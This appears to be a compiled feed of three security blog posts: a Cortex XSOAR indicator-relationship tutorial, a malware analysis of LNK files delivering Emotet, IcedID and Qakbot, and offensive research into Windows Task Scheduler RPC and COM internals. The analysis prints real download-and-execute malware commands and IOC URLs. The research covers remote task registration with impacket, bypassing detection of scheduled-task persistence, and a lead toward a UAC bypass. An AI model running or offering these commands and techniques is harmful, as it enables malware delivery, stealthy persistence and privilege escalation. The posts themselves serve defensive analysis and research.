In Cortex XSOAR, indicators are a key part of the platform: they present the Indicators of Compromise (IOCs) of a security alert in the incident to the SOC analyst and can be used in automated analysis workflows to determine the incident outcome. If you have a Cortex XSOAR Threat Intelligence Management (TIM) license, it is possible to create predefined relationships between indicators to describe how they relate to each other. This enables the SOC analyst to do a more efficient incident analysis based on the indicators associated to the incident.

In this blog post, we will provide some insights into the features of Cortex XSOAR Threat Intelligence Management and how to create indicator relationships in an automation.

Threat Intelligence Management

Threat Intelligence Management (TIM) is a new feature in Cortex XSOAR which requires an additional license on top of your Cortex XSOAR user licenses. It is created to improve the use of threat intel in your SOC. Using TIM, you can automate threat intel management by ingesting and processing indicator sources and exporting the enriched intelligence data to SIEMs, firewalls, and other security platforms.

Cortex XSOAR TIM is a Threat Intelligence Platform with highly actionable Threat data from Unit 42 and not only identify and discover new malware families or campaigns but ability to create and disseminate strategic intelligence reports.

https://www.paloaltonetworks.com/cortex/threat-intel-management

When the TIM license is imported into your Cortex XSOAR environment, all built-in indicator types will have a new Unit 42 Intel tab available:

Unit 42 Intel

This tab contains the threat intelligence data for the specific indicator gathered by Palo Alto and makes it directly available to your SOC analysts.

For Cortex XSOAR File indicators, the Wildfire analysis (the cloud-based threat analysis service of Palo Alto) is available in the indicator layout, providing your SOC analysts with a detailed analysis of malicious binaries if the file hash is known:

Wildfire Analysis

The TIM license also adds the capability to Cortex XSOAR to create relationships between indicators.

If you for example have the following indicators in Cortex XSOAR:

  • Host: ict135456.domain.local
  • MAC: 38-DA-09-8D-57-B1
  • Account: u4872
  • IP: 10.15.62.78
  • IP: 78.132.17.56

Without a TIM license, these indicators would be visible in the indicators section in the incident layout without any context about how they relate to each other:

By creating relationships between these indicators, a SOC analyst can quickly see how these indicators have interacted with each other during the detected incident:

Indicator Relationships

EntityRelationship Class

To create indicator relationships, the EntityRelationship class is available in the CommonServerPython automation.

CommonServerPython is an automation created by Palo Alto which contains Python code that can be used by other automations. Similar to CommonServerUserPython, CommonServerPython is added to all automations, making the code available for you to use in your own custom automation.

In the Relationships subclass of EntityRelationship, you can find all the possible relationships that can be created and how they relate to each other.

RELATIONSHIPS_NAMES = {'applied': 'applied-on',
                       'attachment-of': 'attaches',
                       'attaches': 'attachment-of',
                       'attribute-of': 'owns',
                       'attributed-by': 'attributed-to',
                       'attributed-to': 'attributed-by',
                       'authored-by': 'author-of',
                       'beacons-to': 'communicated-by',
                       'bundled-in': 'bundles',
                       'bundles': 'bundled-in',
                       'communicated-with': 'communicated-by',
                       'communicated-by': 'communicates-with',
                       'communicates-with': 'communicated-by',
                       'compromises': 'compromised-by',
                       'contains': 'part-of',
                       .......

You can define a relationship between indicators by creating an instance of the EntityRelationship class:

indicator_relationship = EntityRelationship(
    name=EntityRelationship.Relationships.USES,
    entity_a="u4872",
    entity_a_type="Account",
    entity_b="ict135456.domain.local",
    entity_b_type="Host"
)

In the name attribute, you set which relationship you want to create. It is best to use the Relationships Enum subclass in case the string values of the relationship names change in a future release.

In the entity_a attribute, add the value of the source indicator.

In the entity_a_type attribute, add the type of the source indicator.

In the entity_b attribute, add the value of the destination indicator.

In the entity_b_type attribute, add the type of the destination indicator.

When initializing the EntityRelationship class, it will validate all the required attributes to see if all information is present to create the relationship. If not, a ValueError exception will be raised.
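
You can catch this in your automation and surface a readable error instead of an unhandled exception, for example:

try:
    indicator_relationship = EntityRelationship(
        name=EntityRelationship.Relationships.USES,
        entity_a="u4872",
        entity_a_type="Account",
        entity_b="ict135456.domain.local",
        entity_b_type="Host"
    )
except ValueError as exc:
    # return_error stops the automation and shows the message in the war room
    return_error(f"Could not create indicator relationship: {exc}")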

Create Indicator Relationships

Now we know which class to use, let’s create the indicator relationships in Cortex XSOAR.

For each relationship we want to create, an instance of EntityRelationship describing the relationship between the indicators should be added to a list:

indicator_relationships = []

indicator_relationships.append(
    EntityRelationship(
        name=EntityRelationship.Relationships.USES,
        entity_a="u4872",
        entity_a_type="Account",
        entity_b="ict135456.domain.local",
        entity_b_type="Host"
    )
)

indicator_relationships.append(
    EntityRelationship(
        name=EntityRelationship.Relationships.BEACONS_TO,
        entity_a="78.132.17.56",
        entity_a_type="IP",
        entity_b="ict135456.domain.local",
        entity_b_type="Host"
    )
)

indicator_relationships.append(
    EntityRelationship(
        name=EntityRelationship.Relationships.ATTRIBUTED_BY,
        entity_a="38-DA-09-8D-57-B1",
        entity_a_type="MAC",
        entity_b="ict135456.domain.local",
        entity_b_type="Host"
    )
)

indicator_relationships.append(
    EntityRelationship(
        name=EntityRelationship.Relationships.USES,
        entity_a="10.15.62.78",
        entity_a_type="IP",
        entity_b="ict135456.domain.local",
        entity_b_type="Host"
    )
)

To create the relationships in Cortex XSOAR, the list of EntityRelationship instances needs to be returned in an instance of the CommandResults class using the return_results function:

return_results(
    CommandResults(
        relationships=indicator_relationships
    )
)

If you now open the relationship view of the Host indicator in Cortex XSOAR, you will see that the relationships have been created:

Indicator Relationships

References

https://docs.paloaltonetworks.com/cortex/cortex-xsoar/6-8/cortex-xsoar-threat-intel-management-guide

https://xsoar.pan.dev/docs/reference/api/common-server-python#entityrelationship

https://xsoar.pan.dev/docs/reference/api/common-server-python#relationshipstypes

https://xsoar.pan.dev/docs/reference/api/common-server-python#relationships

https://xsoar.pan.dev/docs/reference/api/common-server-python#commandresults

About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the SOAR engineering team lead, he is responsible for the development and deployment of automated workflows in Palo Alto Cortex XSOAR, which enable the NVISO SOC analysts to detect attackers faster in customer environments. With his experience in cloud and DevOps, he has enabled the SOAR engineering team to automate the development lifecycle and increase the operational stability of the SOAR platform.

You can contact Wouter via his LinkedIn page.


Want to learn more about SOAR? Sign up here and we will inform you about new content and invite you to our SOAR For Fun and Profit webcast.
https://forms.office.com/r/dpuep3PL5W

Rise of LNK (Shortcut files) Malware

21 June 2022 at 18:58

Authored by Lakshya Mathur

An LNK file is a Windows Shortcut that serves as a pointer to open a file, folder, or application. LNK files are based on the Shell Link binary file format, which holds information used to access another data object. These files can be created manually using the standard right-click "create shortcut" option, or they are sometimes created automatically while running an application. There are also many tools available to build LNK files, and many people have built "lnkbomb" tools specifically for malicious purposes.

During the second quarter of 2022, McAfee Labs has seen a rise in malware being delivered using LNK files. Attackers are exploiting the ease of LNK, and are using it to deliver malware like Emotet, Qakbot, IcedID, Bazarloaders, etc.

Figure 1 – Apr to May month geolocation of the LNK attacks

In this blog, we will see how LNK files are being used to deliver malware such as Emotet, Qakbot, and IcedID.

Below is a screenshot of how these shortcut files look to a normal user.

Figure 2 _ LNK files as seen by a normal user

LNK THREAT ANALYSIS & CAMPAIGNS

With Microsoft disabling Office macros by default, malware actors are now enhancing their lure techniques, including exploiting LNK files, to achieve their goals.

Threat actors are using email spam and malicious URLs to deliver LNK files to victims. These files instruct legitimate applications like PowerShell, CMD, and MSHTA to download malicious files.

We will go through three recent malware campaigns Emotet, IcedID, and Qakbot to see how dangerous these files can be.

 

EMOTET

Infection-Chain

Figure 3 _ Emotet delivered via LNK file Infection-Chain

Threat Analysis

Figure 4 _ Email user received having malicious LNK attached

In Figure 4 we can see the lure message and attached malicious LNK file.

The user is infected by manually accessing the attached LNK file. To dig a little deeper, we see the properties of the LNK file:

Figure 5 _ Properties of Emotet LNK sample

As seen in Figure 5, the target part reveals that the LNK invokes the Windows Command Processor (cmd.exe). The target path shown in the properties is limited to 255 visible characters. However, command-line arguments can be up to 4096 characters, so malicious actors can take advantage of this and pass long arguments that will not be visible in the properties.

In our case the argument is /v:on /c findstr “glKmfOKnQLYKnNs.*” “Form 04.25.2022, US.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”

Figure 6 _ Contents of Emotet LNK file

Once the findstr.exe utility matches the mentioned string, the matching content of the LNK file is saved in a .VBS file under the %temp% folder with the random name YIScZcZKeP.vbs

The next part of the cmd.exe command invokes the VBS file using the Windows Script Host (wscript.exe) to download the main Emotet 64-bit DLL payload.

The downloaded DLL is then finally executed using the REGSVR32.EXE utility, which is similar behavior to the Excel (.xls) based version of Emotet.
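
For triage, the embedded script can be carved out of such an LNK with a few lines of Python once the findstr marker is known (a minimal sketch using the marker and file name from this sample):

MARKER = b"glKmfOKnQLYKnNs"  # findstr marker used by this Emotet sample

def carve(lnk_path, out_path):
    data = open(lnk_path, "rb").read()
    # mimic findstr: keep only the lines containing the marker, which hold the VBS payload
    lines = [ln for ln in data.splitlines(keepends=True) if MARKER in ln]
    if not lines:
        raise SystemExit("marker not found - different sample or marker")
    open(out_path, "wb").write(b"".join(lines))

carve("Form 04.25.2022, US.lnk", "carved_payload.vbs")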

ICEDID

Infection-Chain

Figure 7 _ IcedID delivered via LNK file Infection-Chain

Threat Analysis

This attack is a perfect example of how attackers chain the LNK, PowerShell, and MSHTA utilities to target their victims.

Here, the PowerShell LNK has a highly obfuscated parameter, which can be seen in the target part of the LNK properties in Figure 8.

Figure 8 _ Properties of IcedID LNK sample

The parameter is exceptionally long and is not fully visible in the target part. The whole obfuscated argument is decrypted at run-time, after which MSHTA is executed with the argument hxxps://hectorcalle[.]com/093789.hta.

The downloaded HTA file invokes another PowerShell command with a similarly obfuscated parameter, but this one connects to the URI hxxps://hectorcalle[.]com/listbul.exe

This URI downloads the IcedID installer, a 64-bit EXE payload, under the %HOME% folder.

QAKBOT

Infection-Chain

Figure 9 _ Qakbot delivered via LNK file Infection-Chain

Threat Analysis

This attack shows how attackers can hardcode malicious URLs directly into the shortcut, run them with utilities like PowerShell, and download the main threat payloads.

Figure 10 _ Properties of Qakbot LNK sample

In Figure 10 the full target part argument is “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit iwr -Uri hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png -OutFile $env:TEMP\test.dll;Start-Process rundll32.exe $env:TEMP\test.dll,jhbvygftr”

When this PowerShell LNK is invoked, it connects to hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png using the Invoke-WebRequest command, and the downloaded file is saved under the %temp% folder with the name test.dll

This is the main Qakbot DLL payload which is then executed using the rundll32 utility.

CONCLUSION

As the three threat campaigns above show, attackers abuse Windows shortcut (LNK) files in ways that make them extremely dangerous to ordinary users. LNK combined with PowerShell, CMD, MSHTA, etc., can do severe damage to the victim's machine. Malicious LNKs are generally seen using PowerShell and CMD to connect to malicious URLs and download malicious payloads.

We covered just three of the threat families here, but these files have been seen using other Windows utilities to deliver diverse types of malicious payloads. These types of attacks are still evolving, so every user should inspect LNK shortcut files carefully before opening them. Consumers must keep their operating system and anti-virus up to date, beware of phishing mail, and avoid clicking on malicious links and attachments.

IOC (Indicators of Compromise)

Type | SHA-256 | Scanner
Emotet LNK | 02eccb041972825d51b71e88450b094cf692b9f5f46f5101ab3f2210e2e1fe71 | WSS LNK/Emotet-FSE
IcedID LNK | 24ee20d7f254e1e327ecd755848b8b72cd5e6273cf434c3a520f780d5a098ac9 | WSS LNK/Agent-FTA, Suspicious ZIP!lnk
Qakbot LNK | b5d5464d4c2b231b11b594ce8500796f8946f1b3a10741593c7b872754c2b172 | WSS LNK/Agent-TSR

 

URLs (Uniform Resource Locators)

hxxps://creemo[.]pl/wp-admin/ZKS1DcdquUT4Bb8Kb/

hxxp://filmmogzivota[.]rs/SpryAssets/gDR/

hxxp://demo34.ckg[.]hk/service/hhMZrfC7Mnm9JD/

hxxp://focusmedica[.]in/fmlib/IxBABMh0I2cLM3qq1GVv/

hxxp://cipro[.]mx/prensa/siZP69rBFmibDvuTP1/

hxxps://hectorcalle[.]com/093789.hta

hxxps://hectorcalle[.]com/listbul.exe

hxxps://green-a-thon[.]com/LosZkUvr/B.png

WebAdvisor: All URLs Blocked

 

The post Rise of LNK (Shortcut files) Malware appeared first on McAfee Blog.

Advanced Windows TaskScheduler Playbook

By: zcgonvh
21 June 2022 at 08:08

Part.1 basic

0x00 Preface

Advanced Windows TaskScheduler Playbook

This series is about some of the more fundamental uses of the Windows Task Scheduler; I currently expect it to run to roughly four parts.

Rather than tool documentation or a technical write-up, I prefer to treat these posts as thinking notes for traditional security research: on the one hand laying out the research process and the reasoning behind it, and on the other recording how the research results get turned into practical tooling.

Whether we call it weaponization or security development, the three-step approach stays the same: ground everything in theory, supplement it with research results, and prove it by real-world effectiveness.

Beyond being something you can use, I hope it also offers some inspiration for your own research.

0x01 Observations

Anyone who has spent some time on Windows offense and defense has probably come across scheduled tasks.

As a documented component, the upside is that there is complete official documentation (https://docs.microsoft.com/en-us/windows/win32/taskschd/task-scheduler-start-page) to refer to; for example, with almost no effort we can find the commonly used logon auto-start sample code (https://docs.microsoft.com/en-us/windows/win32/taskschd/logon-trigger-example--c---) and use it with only minor changes.

The downside is that the documentation is far too long and the object-oriented code is far too complex (compared to scripts, and especially to security tooling). Take the logon auto-start sample above: a dozen-plus API calls, an import of taskschd.dll that is pulled in for no obvious reason and cannot be removed, why does it fail when run as a normal user, what is S-1-5-32-544, and where is TASK_LOGON_GROUP even defined?

Fortunately we are security researchers, and security research is especially good at reasoning backwards from conclusions and observed behaviour to causes. Let's play to that strength:

We know scheduled tasks can be created through the UI or the command line, and their parameters and options largely correspond to each other.

We know scheduled tasks can be manipulated through the ITaskService interface, or through the TaskSchedulerClass class and a series of related objects.

We know a scheduled task can be exported as XML, and that XML can be imported again through either the UI or the command line.

We know every scheduled task file is stored under the %SystemRoot%\System32\Tasks directory, with contents identical to the exported XML.

So, from a security research perspective, we can ask a question: what is a scheduled task, essentially? Is it those classes, or is it the XML?

If it is the classes, what role does the XML play, and how is it parsed?

If it is the XML, what role do the classes play?

0x02 Evidence

Although Windows ships symbols for most of its components, at this point there is no need to debug the Windows service yet. We still use the Task Scheduler during lateral movement, so let's start by capturing some traffic:

Advanced Windows TaskScheduler Playbook

We see a screen full of RPC calls; after decrypting them we can see the following:

Advanced Windows TaskScheduler Playbook

A few things stand out. First, the operation number (Opnum) is 1; second, the RPC Stub Data, i.e. the call parameters, clearly contains the new task name, followed by the XML.

Searching for the keywords windows task scheduler rpc leads us to the MS-TSCH protocol (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/21e8e86e-ee5a-469d-917f-28a41f3c25a4). According to the documentation, this is an interface built on top of RPC for remotely creating, deleting, modifying, and querying scheduled tasks, and we also see the familiar ITaskSchedulerService.

Advanced Windows TaskScheduler Playbook

Referring to the chapter ITaskSchedulerService SchRpcRegisterTask (Opnum 1) (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/849c131a-64e4-46ef-b015-9d4c599c5167) and comparing the parameters basically confirms it:

Advanced Windows TaskScheduler Playbook

Finally, impacket provides corroboration: as is well known, atexec.py abuses scheduled tasks, and it likewise creates the remote scheduled task through a SchRpcRegisterTask call:

Advanced Windows TaskScheduler Playbook

So we now have a theoretical basis: on top of MS-DCERPC, Microsoft built the MS-TSCH protocol, which takes XML as its parameter and implements scheduled task management.

0x03 Essence

With MS-TSCH as our theoretical basis, let's switch perspective and try to think like the designer:

(You are an architect now.)

Starting from nothing, how would you design a task scheduler?

First, anyone may call the task scheduler, which means the process should be resident in the background. Low-privileged users must not be able to act as high-privileged users, so the process needs high privileges plus an impersonation mechanism. A high-privileged background process has to account for privilege escalation, so a sound authorization mechanism is required. Scheduled tasks involve no hardware management and are not essential to keeping the system running, so there is no need to go into the kernel.

Second, accepting calls from other processes requires a sensible communication mechanism. Windows has many IPC mechanisms; for authentication purposes, named pipes and ALPC are both options; for ease of use, both ALPC and named pipes have RPC wrappers available on top; for performance, ALPC is unquestionably the first choice (see the official Microsoft blog posts on ALPC ports for details).

Next, remote invocation must be supported for management purposes. For stability, remote communication is mostly built on top of TCP; for firewall and security reasons, the encryption-capable HTTPS/SMB/RPC/DCOM are the candidates. Since remote management usually follows minimal-configuration and graceful-degradation principles, RPC beats DCOM here because it can be configured independently and can talk SMB via ncacn_np without being affected by extra options; and given the principle of a unified API, RPC, which unifies local and remote communication, is the only real choice.

Finally, extensibility requires an extensible storage format. Considering that MS-TSCH is at least fifteen years old, choosing XML for both readability and extensibility is entirely reasonable.

And so we end up with the MS-TSCH protocol: built on MS-DCERPC, passing XML around directly.

In Microsoft's implementation, the Schedule service runs as SYSTEM and holds privileges such as SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege to switch between different users' security contexts. The service exposes local and remote RPC endpoints (EndPoints) in three ways - registering ncalrpc, registering ncacn_np (atsvc), and registering with the endpoint mapper (epmapper) - to provide callers with the services defined by MS-TSCH.

Good: we now have a task scheduler service that communicates via XML and performs authorization transparently.

Now let's switch back to the caller's point of view.

(You are a programmer now. This feature is important, nobody cares how you implement it, and it ships tomorrow.)

Admittedly, writing XML against a template is incomparably convenient for lazy people (by which I specifically mean junior developers, no offence intended). But anyone who has integrated with an API knows that the most painful API in the world is the do-everything endpoint, and the second most painful is definitely passing data around as XML.

MS-TSCH was born at least fifteen years ago and, unfortunately, has both problems. Imagine you are a defender applying a temporary mitigation: you need to build and roll out the following scheduled-task monitor - when event ID 1234 fires, run a powershell command that calls some API.

Just the thought of reading the protocol documentation gives you a headache, and the thought of writing C to make the RPC calls is even worse, right?

So Microsoft used COM to wrap MS-TSCH in an object-oriented layer inside Taskschd.dll, with CLSID 0F87369F-A4E5-4CFC-BD3E-73E6154572DD, and provided a series of helper interfaces offering Trigger, Action, and Folder abstractions.

To support scripting, this class is registered with the ProgId Schedule.Service and implements the IDispatch interface, so scripting languages such as VBS/PowerShell can call it easily.

These are purely wrapper and helper classes and have nothing to do with the actual protocol.

At this point the essence of the TaskScheduler service (the Service, or the RPC endpoint) is obvious: authorize the caller, accept an XML document (whether generated by the helper classes or built by hand), and register it in its own business environment.

From this angle, the Task Scheduler is essentially no different from a traditional web application; we can even use the following diagram as a direct analogy:

Advanced Windows TaskScheduler Playbook

RPC corresponds to HTTP, the OPNUM corresponds to the Action/Method, and the XML corresponds to the Body. Syntax, semantics, and sequencing all line up. Yes, perfect.

In fact, outside of purely binary territory, at least half of all Windows components can be described with this kind of analogy.

Finally, let's turn our thinking back to the security angle.

("Let go of me, I'm an information security engineer.jpg")

From an attacker's perspective, since the vast majority of documentation only covers calling the COM API, we can guess that most defensive measures target Taskschd.dll, so bypassing it by talking RPC directly may be a viable approach.

From a defender's perspective, anything that bypasses the Taskschd.dll wrapper may slip past, or even punch straight through, your defensive stack (and "punch through" is not an exaggeration here).

0x04 COM

Now that we understand part of the essence, we can make calls that are simpler and closer to a security mindset.

(Don't forget: we have already switched our thinking back to the security angle.)

Looking at the C++ sample code, we can see that Microsoft also provides an XML reference (https://docs.microsoft.com/en-us/windows/win32/taskschd/logon-trigger-example--xml-) and notes that ITaskFolder::RegisterTask can be used to register a scheduled task directly from XML.

We can then call ITaskFolder::RegisterTask to replace the earlier, more tedious approach (reference code again taken from MSDN):

    ITaskFolder* pRootFolder = NULL;
    hr = pService->GetFolder(_bstr_t(L"\\"), &pRootFolder);
    if (FAILED(hr))
    {
        printf("Cannot get Root folder pointer: %x", hr);
        pService->Release();
        CoUninitialize();
        return 1;
    }
    IRegisteredTask* pRegisteredTask = NULL;
    pRootFolder->RegisterTask
    (
        _bstr_t(wszTaskName),
        _bstr_t("xml"),
        TASK_CREATE_OR_UPDATE,
        _variant_t(),
        _variant_t(),
        TASK_LOGON_INTERACTIVE_TOKEN,
        _variant_t(),
        &pRegisteredTask
    );
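
The same registration is only a handful of lines from a scripting language, going through the Schedule.Service ProgId / IDispatch wrapper mentioned earlier (a rough Python sketch via pywin32; the XML string is a placeholder for a real task definition):

import win32com.client

TASK_CREATE_OR_UPDATE = 6
TASK_LOGON_INTERACTIVE_TOKEN = 3

xml = "..."  # a full task definition XML, e.g. the MSDN logon-trigger sample

service = win32com.client.Dispatch("Schedule.Service")
service.Connect()                       # local machine, current credentials
root = service.GetFolder("\\")
root.RegisterTask("Test Task", xml, TASK_CREATE_OR_UPDATE,
                  None, None, TASK_LOGON_INTERACTIVE_TOKEN, None)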

0x05 RPC

Likewise, MS-TSCH 6.3 Appendix A.3: SchRpc.idl (https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/96c9b399-c373-4490-b7f5-78ec3849444e) provides the complete IDL; after compiling the IDL we can make simple RPC calls directly:

RpcTryExcept
  {
    wchar_t* pActualPath = 0;
    const wchar_t* xml = L"<!--snipped xml-->";
    _TASK_XML_ERROR_INFO *errorInfo = 0;
    SchRpcRegisterTask
    (
      schrpc_binding_handle,
      L"\\Test Task",
      xml,
      6,
      0,
      0,
      0,
      0,
      &pActualPath,
      &errorInfo
    );
  }
RpcExcept(1)
  {
    DWORD code = RpcExceptionCode(); 
    printf("RPC Exception %d\n", code);
  }
RpcEndExcept;
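
The same SchRpcRegisterTask call can also be driven from Python through impacket's MS-TSCH bindings, which is essentially what atexec.py does (a rough sketch; the target, credentials, and XML are placeholders):

from impacket.dcerpc.v5 import transport, tsch
from impacket.dcerpc.v5.dtypes import NULL

xml = "..."  # task definition XML

rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:192.0.2.1[\pipe\atsvc]')
rpctransport.set_credentials('user', 'password', 'DOMAIN')

dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(tsch.MSRPC_UUID_TSCHS)
# flags=TASK_CREATE, as used by atexec.py
tsch.hSchRpcRegisterTask(dce, '\\Test Task', xml,
                         tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)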

At least at the time this article was published, direct RPC calls could bypass a fair number of security products' detection of scheduled-task auto-start persistence.

0x06 Summary

This chapter looked at the protocol layer and established a basic fact: the Windows Task Scheduler's design, protocol, and implementation are all built around the XML format. On that basis it introduced simpler and more convenient ways to drive it.

Fundamentals are called fundamentals because everything that follows is strongly tied to them, not because they are merely simple and easy to understand.

I have always believed that programming concepts and design patterns are the most fundamental security techniques. In this long and rather dry first chapter, we used the two basic object-oriented concepts of abstraction and encapsulation, plus the Transport/Channel terminology Microsoft uses so liberally behind the scenes (if you searched the keywords from the sections above and read the original documents, you will certainly have noticed it), to analyse Microsoft's design thinking from the side. That lets us better understand how the component works, eventually find its weak points, and put them to use.

The following chapters will, without exception, build on this foundation to walk through a few interesting applied examples.

Part.2 from COM to UAC bypass and get SYSTEM directly

Erratum: in the previous article, section 0x03, the CLSID given for the COM wrapper class was wrong; it should be 0F87369F-A4E5-4CFC-BD3E-73E6154572DD.

The official-account post cannot be edited, so I am recording the correction here.

From this article on, technical terms will be highlighted with their official English names.

0x00 Thinking

In the previous chapter, by analyzing MS-TSCH we clarified Microsoft's overall design for the Task Scheduler: documented XML as the description format, the RPC protocol as the foundation, exposing function-style RPC calls while offering an object-oriented view through a COM helper.

Programming thought and design patterns should be the most fundamental security skill; the Task Scheduler's design clearly shows an evolution from procedural to object-oriented - the process commonly known as encapsulation.

Sticking with the familiar web analogy, think of it as:

PHP5 evolving into PHP7.
PHP/ASP evolving into Java/.Net.
JS evolving into TS/ES6.

(At the development and design level, some ideas are universal and almost never change.)

Unlike the scripts or tools we commonly use during a pentest, in a complete system a wrapped component or a full protocol implementation has no meaning beyond its implementation on its own. Only when a consumer (call it the "caller") invokes it according to some business logic, and multiple complete business functions are composed into a system by that logic, does the component become "meaningful".

(If you accept this view, then every pentest trick, incident write-up and vulnerability analysis you have read can be matched to an example of it - without question, every single one.)

The Task Scheduler is one of the documented components, so of course we can call it directly by the book. Whether you use the C/C++ or VBS Microsoft shipped fifteen years ago, the C# interop that came with VS2008 fourteen years ago, or the PowerShell everyone has been flogging for a decade, you can crank out some Red team / weaponized / pentesting tools.

Thanks, Microsoft, for all the convenient APIs. But putting the researcher hat back on, we should not overlook this: the Task Scheduler, as one of the important system components, is used by many of the system's own feature modules.

So let's think through a set of questions:

Which built-in features call the Task Scheduler?
What can each of those features do?
Is the feature itself componentized, i.e. callable through some interface?
Is there any possibility of use or abuse?

0x01 Fundamentals

Before answering, let's brush up on COM basics.

Microsoft provides very complete introductory documentation, https://docs.microsoft.com/en-us/windows/win32/com/com-fundamentals, along with sample code; both go back at least to the Windows 2000 era.

(I don't want to spend much space on literature research. In my experience, spending two days chewing through the original docs end to end - with the same drive you bring to bug hunting and the same rigor you bring to collecting references for a paper - beats reading ten technical articles. Including the one you are reading.)

Using the docs as a checklist, let's recall the most basic points:

1. At the design level, the COM model separates interface from implementation.

For example, ITaskService in the scheduled-task sample code.

2. COM components are uniquely identified by GUIDs: the IID (Interface IDentifier) for an interface and the CLSID (CLaSs IDentifier) for a class.

For example, CLSID_TaskScheduler is defined as 0F87369F-A4E5-4CFC-BD3E-73E6154572DD.

3. A COM component must be registered in the registry before it can be called. Normally, system-predefined components are registered under HKEY_LOCAL_MACHINE\SOFTWARE\Classes and per-user components under HKEY_CURRENT_USER\SOFTWARE\Classes; HKEY_CLASSES_ROOT is the merged view of the two, and from the perspective of a system service it is equivalent to HKEY_LOCAL_MACHINE\SOFTWARE\Classes.

For example, the Task Scheduler component's registration lives under HKEY_CLASSES_ROOT\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd} (a quick way to read this registration is sketched right after this list).

4. The smallest independently runnable unit on Windows is the process and the smallest reusable code unit is the class library, so COM likewise has Out-Of-Process and In-Process implementations. In most cases an out-of-process COM component is an exe and an in-process one is a dll.

For example, the Task Scheduler COM object is an in-process component, implemented by taskschd.dll.

5. For convenience, a ProgId (Programmatic IDentifier) can be assigned to a CLSID as an alias.

For example, the Task Scheduler component's ProgId is Schedule.Service.1.

6. When a client calls CoCreateInstance, CoCreateInstanceEx, CoGetClassObject and friends, an instance of the object with the specified CLSID is created; this process is called Activation.

For example, CoCreateInstance(CLSID_TaskScheduler,....) in Microsoft's sample code.

7. COM uses the factory pattern to decouple callers from implementations, covering activation, communication and conversion for both in-process and out-of-process components; IUnknown::QueryInterface and IClassFactory run through all of it.

For example, the big pile of QueryInterface calls in Microsoft's sample code.
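To tie points 3-5 back to something concrete, here is a small sketch that reads the Task Scheduler component's registration straight from the registry (paths as listed above; whether a ProgID subkey is present may vary by build, so treat this purely as an illustration):

# Inspect the CLSID registration of the Task Scheduler COM component.
$clsid = '{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}'
Get-ItemProperty "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\InprocServer32"   # implementing DLL
Get-ItemProperty "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\ProgID"           # ProgId alias, if registered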

Now that we have a basic picture of COM, the next step is to trace the use of one tiny COM object inside a huge, complicated operating system. However complex a system is, in the end it is written by people and built by a compiler. We know Windows is built with VS, in Microsoft-flavored C/C++, by ordinary engineers.

So, thinking time: you are one of those programmers, and your code is as robust as your constitution. You need to create a C/C++ project in VS that uses the Task Scheduler to do something.

- How would you write it?

- #include <taskschd.h>

- Why?

- Because the "standard" sample does it that way.

Very good - we have the first method:

Search every system component for 0F87369F-A4E5-4CFC-BD3E-73E6154572DD in string form, as well as in its binary representation.

Now switch back to security and moonlight as a sample analyst for a moment: you are an incident-response engineer who has already taken the well-known APT samples apart inside and out. You are on site in a customer's intranet analyzing a batch of malicious samples, and you know one of them creates a scheduled task. Without an automated sandbox, how do you fish it out for follow-up analysis?

- Need you even ask? Fire up ProcMon and let the AV have at it.

Which gives us the second method:

Track reads of the registry key HKEY_CLASSES_ROOT\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 and recover the call stack through logging, hooking, hijacking and so on.

Finally, switch to the setting we know best, security tooling and red-vs-blue: someone abroad has released a framework - endlessly extensible, slides past every AV, has a great scheduled-task feature, and even ships source you can crib from. The only problem: you cannot tell where it calls the Task Scheduler; all you see is a pile of configuration files and design patterns.

- Just drop it into the IDE, search for the CLSID, IID and ProgId, and follow the references back.

And that is the third method:

Considering factories and dynamic invocation, search static data such as configuration files for 0F87369F-A4E5-4CFC-BD3E-73E6154572DD and its binary representation.

0x02 Discovery

We now have three workable ways to trace it.

Weigh their pros and cons: the second, dynamic approach reveals the caller directly, but only if there is an active call.
Scheduled tasks are not something that gets invoked all the time, and Windows is far too complex to exercise every feature by hand, so let's shelve it for now.

Methods one and three both boil down to static searching. Since our target is COM-based and almost all COM configuration lives in the registry, we start by searching the registry - the biggest shared "configuration file" of them all - and get the result shown below:

C:\>reg query HKEY_CLASSES_ROOT\CLSID\{A6BFEA43-501F-456F-A845-983D3AD7B8F0} /s

HKEY_CLASSES_ROOT\CLSID\{A6BFEA43-501F-456F-A845-983D3AD7B8F0}
    (默认)    REG_SZ    Virtual Factory for MaintenanceUI
    AppId    REG_SZ    {A6BFEA43-501F-456F-A845-983D3AD7B8F0}
    LocalizedString    REG_EXPAND_SZ    @%SystemRoot%\System32\MaintenanceUI.dll,-1

HKEY_CLASSES_ROOT\CLSID\{A6BFEA43-501F-456F-A845-983D3AD7B8F0}\Elevation
    Enabled    REG_DWORD    0x1

HKEY_CLASSES_ROOT\CLSID\{A6BFEA43-501F-456F-A845-983D3AD7B8F0}\InProcServer32
    (默认)    REG_EXPAND_SZ    %SystemRoot%\System32\shpafact.dll
    ThreadingModel    REG_SZ    Apartment

HKEY_CLASSES_ROOT\CLSID\{A6BFEA43-501F-456F-A845-983D3AD7B8F0}\VirtualServerObjects
    {0f87369f-a4e5-4cfc-bd3e-73e6154572dd}    REG_SZ

We have found something suspicious:

An undocumented COM component, A6BFEA43-501F-456F-A845-983D3AD7B8F0, implemented by %SystemRoot%\System32\shpafact.dll.
An undocumented custom registry key, VirtualServerObjects, whose value contains the Task Scheduler component's CLSID.
Elevation@Enabled=1, which means it is eligible for UAC auto-elevation.

Next we analyze this component, work out what it is for by design, and explore whether it can be abused.

0x03 Analysis

Now we analyze what this COM component implements and whether it can be exploited.

